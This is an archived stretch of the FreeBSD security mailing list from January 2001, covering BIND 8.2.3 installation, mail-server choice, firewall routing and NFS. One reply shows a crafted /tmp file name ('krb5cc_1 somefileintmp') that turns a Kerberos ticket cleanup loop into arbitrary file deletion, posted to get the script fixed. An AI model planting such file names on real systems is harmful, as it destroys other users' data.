UW imap server are not that relevant, but still, that is one bug-ridden piece of software and I think it's just a matter of time before another security related bug is discovered. The same goes for popper and as I do not have the time to do the research, I hope to hear from experienced admins out there who have done the research (tee hee :-)) and are willing to share their knowledge and experience. Once I install the pop / imap servers I will allow access to pop and imap from localhost only, allowing users to tunnel to pop / imap through ssh. That takes care of the major threat, but still, there are a few local users that pose a potential threat, so I need proven, secure and easily deployable solutions. Thank you, Edward W. M. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8:20: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.marketnews.com (mail.marketnews.com [205.183.200.2]) by hub.freebsd.org (Postfix) with ESMTP id C625A37B65D for ; Tue, 30 Jan 2001 08:19:47 -0800 (PST) Received: from mharding (mason@[205.183.200.47]) by mail.marketnews.com (8.11.0/8.9.3) with SMTP id f0UGJau78693 for ; Tue, 30 Jan 2001 11:19:36 -0500 (EST) From: "Mason Harding" To: Subject: Revised: My FreeBSD Firewall Date: Tue, 30 Jan 2001 08:14:23 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <980823154.3a762c72329fd@mail.marketnews.com> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I am now just trying to implement a FreeBSD firewall, say with the IP address of 172.16.5.2, with the router being 172.16.5.1, and the network being 172.16.5.0/24. How can I handle the routing on this? my routing table is basically as such... Destination Gateway Netif default 172.16.5.1 fxp0 172.15.5 link#1 fxp1 172.16.5.1 0:0:c:80:f:30 fxp0 172.15.5.2/32 link#1 fxp0 I can ping 172.16.5.1 with success, but if I try to ping anything past it(on the internet) I get no response. I can also ping anything on the LAN. Am I going about implementing this firewall correctly? Should I not just be adding a static route for 172.16.5.1? Sorry if this made no since. Thank you, Mason To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8:40:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id CCF9437B491 for ; Tue, 30 Jan 2001 08:40:06 -0800 (PST) Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 30 Jan 2001 08:37:45 -0800 Received: (from cjc@localhost) by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f0UGdSR10358; Tue, 30 Jan 2001 08:39:28 -0800 (PST) (envelope-from cjc) Date: Tue, 30 Jan 2001 08:39:28 -0800 From: "Crist J. Clark" To: Dan Langille Cc: security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem Message-ID: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> Reply-To: cjclark@alum.mit.edu References: <200101300712.UAA56104@ducky.nz.freebsd.org>; <20010130012616.J91447@rfx-216-196-73-168.users.reflex> <200101301138.AAA64905@ducky.nz.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 31, 2001 at 12:38:28AM +1300, Dan Langille wrote: > On 30 Jan 2001, at 1:26, Crist J. Clark wrote: > > > > It can't be that simple! > > > > I hate to break it to you (I guess?), but it is. I did it on my > > CURRENT box for testing and it clobbered the old BIND quite nicely. > > Before, > > > > bubbles# ls -l /usr/sbin/named > > -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named > > > > After, > > > > bubbles# !ls > > ls -l /usr/sbin/named > > -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named > > > > Like I said, PREFIX rocks. > > I actually tried: make PREFIX=/usr DESTETC=/etc install > > The only catch was needing to have /etc/name.conf, so I created a > symlink: > > # ln -s /etc/named.conf /etc/namedb/named.conf > > I'll do more testing in the morning.... True, FreeBSD uses, DESTETC= /etc/namedb If you really want to mimic the FreeBSD install, look at the Makefiles in /usr/src/usr.sbin/named. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 8:53:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 7533D37B503 for ; Tue, 30 Jan 2001 08:53:08 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id C14A56A904 for ; Tue, 30 Jan 2001 11:53:07 -0500 (EST) Message-ID: <00ba01c08add$32532850$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Subject: bind8.2.3 port Date: Tue, 30 Jan 2001 11:53:40 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Form where I can get bind8.2.3 port? I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz in ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ Thanks, Rossen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 9: 4:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.org (adsl-64-169-104-72.dsl.lsan03.pacbell.net [64.169.104.72]) by hub.freebsd.org (Postfix) with ESMTP id A5A0737B491 for ; Tue, 30 Jan 2001 09:03:50 -0800 (PST) Received: by obsecurity.org (Postfix, from userid 1000) id 1C1F8BA2B4; Tue, 30 Jan 2001 09:04:21 -0800 (PST) Date: Tue, 30 Jan 2001 09:04:20 -0800 From: Kris Kennaway To: Rossen Raykov Cc: freebsd-security@FreeBSD.ORG Subject: Re: bind8.2.3 port Message-ID: <20010130090420.A52164@xor.obsecurity.org> References: <00ba01c08add$32532850$4c00000a@sage> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jI8keyz6grp/JLjh" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <00ba01c08add$32532850$4c00000a@sage>; from rraykov@sageian.com on Tue, Jan 30, 2001 at 11:53:40AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jI8keyz6grp/JLjh Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 30, 2001 at 11:53:40AM -0500, Rossen Raykov wrote: > Hi, >=20 > Form where I can get bind8.2.3 port? > I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz in > ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ The package hadn't yet been rebuilt (the above URL contains packages, not ports). Build it yourself for now: cd /usr/ports/net/bind8 && make all install clean Kris --jI8keyz6grp/JLjh Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6dvQUWry0BWjoQKURAmhfAJ9snx42o7pymlWYWp3KwDNV8mRj2QCfZJIV 8/IQvIa58xIuyOqc7eZ8kvg= =ZQbM -----END PGP SIGNATURE----- --jI8keyz6grp/JLjh-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 10: 7:37 2001 Delivered-To: freebsd-security@freebsd.org Received: from web9303.mail.yahoo.com (web9303.mail.yahoo.com [216.136.129.52]) by hub.freebsd.org (Postfix) with SMTP id B705037B4EC for ; Tue, 30 Jan 2001 10:07:17 -0800 (PST) Message-ID: <20010130180717.62674.qmail@web9303.mail.yahoo.com> Received: from [212.253.3.41] by web9303.mail.yahoo.com; Tue, 30 Jan 2001 10:07:17 PST Date: Tue, 30 Jan 2001 10:07:17 -0800 (PST) From: Omer Faruk Sen Subject: Re: bind8.2.3 port To: Rossen Raykov Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You can download that port from www.freshports.org or www.freebsd.org/ports But I think there is a compilation problem with it.I am not sure but I have tried to compile that port 4 times with the same source code.It has given me errors everytime and all of them was in different .c file.Weird isn't it.And after compiling it.I made a reboot but sysctl command and some of my system command started to give core dumps.I am not sure bind8.2.3 port is the reason for that any feedback ??? --- Rossen Raykov wrote: > Hi, > > Form where I can get bind8.2.3 port? > I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz > in > ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ > > Thanks, > > Rossen > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of > the message __________________________________________________ Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 10:29:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0BE9A37B491 for ; Tue, 30 Jan 2001 10:29:25 -0800 (PST) Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by mx1.FreeBSD.org (Postfix) with ESMTP id C50776E26F4 for ; Tue, 30 Jan 2001 10:29:23 -0800 (PST) Received: from [127.0.0.1] (helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14NfZc-0000ZD-00; Tue, 30 Jan 2001 11:32:12 -0700 Message-ID: <3A7708AC.8B490984@softweyr.com> Date: Tue, 30 Jan 2001 11:32:12 -0700 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: "Edward W. M." Cc: freebsd-security@FreeBSD.ORG Subject: Re: POP3 / IMAP security References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Edward W. M." wrote: > > Hi everyone, > > I apologize in advance if you feel that I should have posted > this to questions. > > I intend to run POP and IMAP services on a new machine, so I > need easily deployable secure servers that can be installed from > the ports. > > Cyrus is out of the question for me, I am running that on another > box and I just need something more easily deployable for this one. > All my users have shell access and log in via ssh, so the bugs > in the UW imap server are not that relevant, but still, that is > one bug-ridden piece of software and I think it's just a matter > of time before another security related bug is discovered. The > same goes for popper and as I do not have the time to do the > research, I hope to hear from experienced admins out there who have > done the research (tee hee :-)) and are willing to share their > knowledge and experience. Courier. It's GPL, but it seems reliable. I'm learning quite a bit more about it right now, working on an authentication module to work with our user database (stored in PostgreSQL). Courier works well with either BSD-style mailboxes or Maildirs. We use it in conjunction with Qmail, though I am experimenting with Cyrus and Postfix as well. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 10:44: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from sonar.noops.org (adsl-63-195-97-84.dsl.snfc21.pacbell.net [63.195.97.84]) by hub.freebsd.org (Postfix) with ESMTP id E329737B69D for ; Tue, 30 Jan 2001 10:43:43 -0800 (PST) Received: from localhost (root@localhost) by sonar.noops.org (8.9.3/8.9.3) with ESMTP id KAA43289; Tue, 30 Jan 2001 10:43:50 -0800 (PST) (envelope-from root@noops.org) Date: Tue, 30 Jan 2001 10:43:50 -0800 (PST) From: Thomas Cannon To: Mason Harding Cc: freebsd-security@FreeBSD.ORG Subject: Re: Revised: My FreeBSD Firewall In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > I can ping 172.16.5.1 with success, but if I try to ping anything past it(on > the internet) I get no response. I can also ping anything on the LAN. Am I Can you ping the other interface of that router? Is it passing packets? It sounds like your basic networking on your FBSD machine is okay, but that the router isn't routing. From the router can you get to the internet? -tcannon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11: 6:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (sproxy.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 624B237B6AD for ; Tue, 30 Jan 2001 11:06:35 -0800 (PST) Received: (qmail 19521 invoked by uid 0); 30 Jan 2001 19:06:33 -0000 Received: from p3ee21603.dip.t-dialin.net (HELO speedy.gsinet) (62.226.22.3) by mail.gmx.net (mp016-rz3) with SMTP; 30 Jan 2001 19:06:33 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id TAA12277 for freebsd-security@freebsd.org; Tue, 30 Jan 2001 19:50:57 +0100 Date: Tue, 30 Jan 2001 19:50:56 +0100 From: Gerhard Sittig To: freebsd-security@freebsd.org Subject: Re: cvs commit: src/usr.bin/login login.c Message-ID: <20010130195056.C253@speedy.gsinet> Mail-Followup-To: freebsd-security@freebsd.org References: <7897.980850042@axl.fw.uunet.co.za> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <7897.980850042@axl.fw.uunet.co.za>; from sheldonh@uunet.co.za on Tue, Jan 30, 2001 at 12:20:42PM +0200 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jan 30, 2001 at 12:20 +0200, Sheldon Hearn wrote: > > On Tue, 30 Jan 2001 05:08:09 EST, Stu Pidaso wrote: > > > > # Destroy all stale Kerberos5 tickets > > > # > > > for i in `find /tmp -name 'krb5cc_*' -ctime +1 -print` ; do > > > rm -f $i > > > done > > > > and now you can delete you can delete any file in /tmp. > > > > touch 'krb5cc_1 somefileintmp' and wait. > > Well spotted. > > find /tmp -name 'krb5cc_*' -ctime +1 -exec rm -f {} \; > > I don't use -delete because it's not portable. What about the -print0 option and xargs(1)? Is it as portable as the above construction? Since this would result in less load (*much* less exec'ed processes). The "The xargs utility is expected to be IEEE Std 1003.2 (``POSIX.2'') compliant." part of `man xargs` gives me hope ... find /tmp -name 'krb5cc_*' -ctime +1 -print0 | xargs -0 rm -f virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:12:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailman.sprintlabs.com (mx.sprintlabs.com [208.30.174.2]) by hub.freebsd.org (Postfix) with ESMTP id 5027B37B6AA for ; Tue, 30 Jan 2001 11:12:20 -0800 (PST) Received: by mailman.sprintlabs.com with Internet Mail Service (5.5.2652.78) id ; Tue, 30 Jan 2001 11:12:18 -0800 Received: from sprintlabs.com (ip199-2-53-135.sprintlabs.com [199.2.53.135]) by mailman.sprintlabs.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2652.78) id DZL7240Z; Tue, 30 Jan 2001 11:12:09 -0800 From: Steven Davidson Reply-To: Steven Davidson To: Sam Wun Cc: freebsd-security@freebsd.org Message-ID: <3A7713B7.EFCA95EB@sprintlabs.com> Date: Tue, 30 Jan 2001 11:19:19 -0800 X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.1.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 Subject: Re: NFS security References: <20010129045116.A5564@crow.dom2ip.de> <3A7502CF.D5172D9D@esec.com.au> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sam Wun wrote: > Hi, > > Does anyone knows how to setup NFS trust like the one in Solaris 8 in FreeBSD? > > Thanks Sam. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message If, by NFS trust, you mean secureRPC than you are mostly out of luck. Although FreeBSD supports secureRPC, it doesn't apply to NFS. You can map all remote users to "nobody" or even "somebody" but real NFS authentication is non-existent. Perhaps kerberos will provide a solution. Also, you can wait for NFSv4. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:30:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.sageian.com (ns.sage-consult.com [208.201.118.11]) by hub.freebsd.org (Postfix) with ESMTP id 94C2937B6AA for ; Tue, 30 Jan 2001 11:30:06 -0800 (PST) Received: from pricli012 (proxy.sageian.com [208.201.118.126]) by mail.sageian.com (Postfix) with SMTP id 66CD16A904; Tue, 30 Jan 2001 14:30:05 -0500 (EST) Message-ID: <013d01c08af3$1fd80270$4c00000a@sage> Reply-To: "Rossen Raykov" From: "Rossen Raykov" To: Cc: References: <20010130180717.62674.qmail@web9303.mail.yahoo.com> Subject: Re: bind8.2.3 port Date: Tue, 30 Jan 2001 14:30:38 -0500 Organization: SageConsult, Princeton MIME-Version: 1.0 Content-Type: text/plain; charset="windows-1251" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The port from www.freshports.org works fine for me. Everything compiled from the first time. I received errors only during package registration after install. Even after that the new bind is working fine (I'm running it in chroot environment). The only thing that bothers me is the reported version: bash$ nslookup -q=txt -class=CHAOS version.bind. 0 Server: server.com Address: 0.0.0.0 VERSION.BIND text = "8.2.3-REL" I hope this is not vulnerable. Can someone confirm that? Thanks, Rossen ----- Original Message ----- From: To: Cc: Sent: Tuesday, January 30, 2001 1:07 PM Subject: Re: bind8.2.3 port > You can download that port from www.freshports.org or > www.freebsd.org/ports > But I think there is a compilation problem with it.I > am not sure but I have tried to compile that port 4 > times with the same source code.It has given me errors > everytime and all of them was in different .c > file.Weird isn't it.And after compiling it.I made a > reboot but sysctl command and some of my system > command started to give core dumps.I am not sure > bind8.2.3 port is the reason for that any feedback ??? > > > > --- Rossen Raykov wrote: > > Hi, > > > > Form where I can get bind8.2.3 port? > > I found only bind-8.2.2.p7.tgz and bind-9.1.0.tgz > > in > > > ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/All/ > > > > Thanks, > > > > Rossen > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of > > the message > > > __________________________________________________ > Get personalized email addresses from Yahoo! Mail - only $35 > a year! http://personal.mail.yahoo.com/ > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:51:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from pozitif.net (unknown [213.194.71.201]) by hub.freebsd.org (Postfix) with SMTP id 6B7BE37B6BB for ; Tue, 30 Jan 2001 11:51:14 -0800 (PST) Received: from pozitif.net ([212.253.52.107]) by pozitif.net ; Tue, 30 Jan 2001 21:59:27 +0200 Message-ID: <3A771B39.69D774BB@pozitif.net> Date: Tue, 30 Jan 2001 21:51:22 +0200 From: Mehmet Hinc X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.2-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Bind8.2.3 and installation Problem Solved Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thanks for everyone who interested it , and I solved my problem.(happy now :PP) Thanks Mehmet Hinc from TURKEY To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 11:56: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 70D5F37B6BB for ; Tue, 30 Jan 2001 11:55:47 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id IAA67144; Wed, 31 Jan 2001 08:55:42 +1300 (NZDT) Message-Id: <200101301955.IAA67144@ducky.nz.freebsd.org> From: "Dan Langille" Organization: novice in training To: "Crist J. Clark" Date: Wed, 31 Jan 2001 08:55:31 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG In-reply-to: <20010130083928.K91447@rfx-216-196-73-168.users.reflex> References: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 8:39, Crist J. Clark wrote: > On Wed, Jan 31, 2001 at 12:38:28AM +1300, Dan Langille wrote: > > On 30 Jan 2001, at 1:26, Crist J. Clark wrote: > > > > > > It can't be that simple! > > > > > > I hate to break it to you (I guess?), but it is. I did it on my > > > CURRENT box for testing and it clobbered the old BIND quite nicely. > > > Before, > > > > > > bubbles# ls -l /usr/sbin/named > > > -r-xr-xr-x 1 root wheel 501408 Jan 18 13:17 /usr/sbin/named > > > > > > After, > > > > > > bubbles# !ls > > > ls -l /usr/sbin/named > > > -rwxr-xr-x 1 root wheel 595752 Jan 30 01:22 /usr/sbin/named > > > > > > Like I said, PREFIX rocks. > > > > I actually tried: make PREFIX=/usr DESTETC=/etc install > > > > The only catch was needing to have /etc/name.conf, so I created a > > symlink: > > > > # ln -s /etc/named.conf /etc/namedb/named.conf > > > > I'll do more testing in the morning.... > > True, FreeBSD uses, > > DESTETC= /etc/namedb > > If you really want to mimic the FreeBSD install, look at the Makefiles > in /usr/src/usr.sbin/named. Thanks. For those that want to know, and I know you're out there: make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc install I didn't use any of the other options... After the install, the /etc/named.conf symlink was no longer needed. ndc reload seems to be fine. I'll do some more testing later (there's not actually any zones loaded on this box). -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 12:44:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from arjun.niksun.com (unknown [63.148.27.34]) by hub.freebsd.org (Postfix) with ESMTP id DD3EB37B69E for ; Tue, 30 Jan 2001 12:44:04 -0800 (PST) Received: from stiegl.niksun.com (stiegl.niksun.com [10.0.0.44]) by arjun.niksun.com (8.9.3/8.9.3) with ESMTP id PAA42392; Tue, 30 Jan 2001 15:42:44 -0500 (EST) (envelope-from ath@stiegl.niksun.com) Received: (from ath@localhost) by stiegl.niksun.com (8.9.2/8.8.7) id PAA69019; Tue, 30 Jan 2001 15:44:03 -0500 (EST) (envelope-from ath) To: dan@langille.org Cc: "Crist J. Clark" , security@FreeBSD.ORG Subject: Re: bind8.2.3 and installation problem References: <200101301138.AAA64905@ducky.nz.freebsd.org>; from dan@langille.org on Wed, Jan 31, 2001 at 12:38:28AM +1300 <200101301955.IAA67144@ducky.nz.freebsd.org> From: Andrew Heybey Date: 30 Jan 2001 15:44:02 -0500 In-Reply-To: "Dan Langille"'s message of "Wed, 31 Jan 2001 08:55:31 +1300" Message-ID: <85snm0rcrx.fsf@stiegl.niksun.com> Lines: 22 X-Mailer: Gnus v5.5/XEmacs 20.4 - "Emerald" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Thanks. For those that want to know, and I know you're out there: > > make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb > DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin > DESTHELP=/usr/share/misc install > > I didn't use any of the other options... > > After the install, the /etc/named.conf symlink was no longer needed. > ndc reload seems to be fine. I'll do some more testing later (there's not > actually any zones loaded on this box). Thanks to all for the makefile research (and for posting the results). As a minor tip, I note that if you use the port as opposed to selectively upgrading via /usr/src then you: 1. Have a record in /var/db/pkg that the fix was applied. 2. Can easily make a binary package that can be simply pkg_add'ed on systems without source (I have tried it on 3.2 and 4.2). andrew To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 13:26:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 847AB37B6AC for ; Tue, 30 Jan 2001 13:25:42 -0800 (PST) Received: from wocker (wocker.int.nz.freebsd.org [192.168.0.99]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with ESMTP id KAA67777; Wed, 31 Jan 2001 10:25:35 +1300 (NZDT) Message-Id: <200101302125.KAA67777@ducky.nz.freebsd.org> From: "Dan Langille" Organization: novice in training To: Andrew Heybey Date: Wed, 31 Jan 2001 10:25:41 +1300 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: bind8.2.3 and installation problem Reply-To: dan@langille.org Cc: security@FreeBSD.ORG References: "Dan Langille"'s message of "Wed, 31 Jan 2001 08:55:31 +1300" In-reply-to: <85snm0rcrx.fsf@stiegl.niksun.com> X-mailer: Pegasus Mail for Win32 (v3.12c) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 30 Jan 2001, at 15:44, Andrew Heybey wrote: > 2. Can easily make a binary package that can be simply pkg_add'ed on systems > without source (I have tried it on 3.2 and 4.2). That's a good point Andrew. I compiled bind on a dual XEON, then did a make package, and copied the tarball to my DNS server and did a pkg_add. This process took about 10 minutes from start to finish. To do that on my DNS server (which is a 486) would have taken hours. note: remember to use the same make options at all stages of the process. e.g. # make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc install # make PREFIX=/usr PIDDIR=/var/run DESTETC=/etc/namedb DESTEXEC=/usr/libexec DESTRUN=/var/run DESTSBIN=/usr/sbin DESTHELP=/usr/share/misc package cheers -- Dan Langille pgpkey - finger dan@unixathome.org | http://unixathome.org/finger.php To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 30 13:56:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from merton.slipstreams.net (owirc.com [208.45.226.107]) by hub.freebsd.org (Postfix) with ESMTP id 0159E37B6B0; Tue, 30 Jan 2001 13:56:30 -0800 (PST) Received: from cc481952a (arcane.slipstreams.net [192.168.1.1]) by merton.slipstreams.net (8.11.1/8.11.1) with SMTP id f0UE4Eq80917; Tue, 30 Jan 2001 14:04:14 GMT (envelope-from kupek@earthlink.net) From: "Scott Hilton" To: "Kris Kennaway" Cc: Subject: RE: [COVERT-2001-01] Multiple Vulnerabilities in BIND - FreeBSD Implications ? Date: Tue, 30 Jan 2001 13:56:14 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Importance: Normal In-Reply-To: <20010129172540.B1562@citusc17.usc.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org To those that want to upgrade to 8.2.3-REL before the official FreeBSD advisories are released, if you are already running 4.2-STABLE, its only a matter of uncompressing the tarball from ftp.isc.org, and doing a 'make install'. There don't appear to be any conflicts with any pathnames changing (at least none that I could see). Scott -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf 